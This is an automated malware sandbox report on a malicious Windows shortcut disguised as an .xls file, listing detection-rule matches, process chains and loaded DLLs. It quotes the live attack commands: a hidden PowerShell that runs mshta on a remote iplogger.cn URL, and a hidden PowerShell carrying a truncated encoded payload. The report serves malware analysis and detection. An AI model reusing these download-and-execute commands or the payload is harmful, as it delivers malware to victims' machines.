Source: 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2000051277.000001E1C0ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2000051277.000001E1C2433000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.1997538671.000001E1BE6F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2000051277.000001E1C2482000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2000051277.000001E1C243E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Shellcode.Generic, fingerprint = 834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4, id = 8c487e57-4b8c-488e-a1d9-786ff935fd2c, last_modified = 2022-07-18
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: mshta.exe PID: 7472, type: MEMORYSTR	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7812, type: MEMORYSTR	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 7812, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta, type: DROPPED	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.bank.troj.evad.winLNK@11/16@3/4

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u21k0mxa.jz0.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used in galleries to represen

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: ____ ______.xls.lnk.bin.lnk	ReversingLabs: Detection: 26%
Source: ____ ______.xls.lnk.bin.lnk	Virustotal: Detection: 30%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVAB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
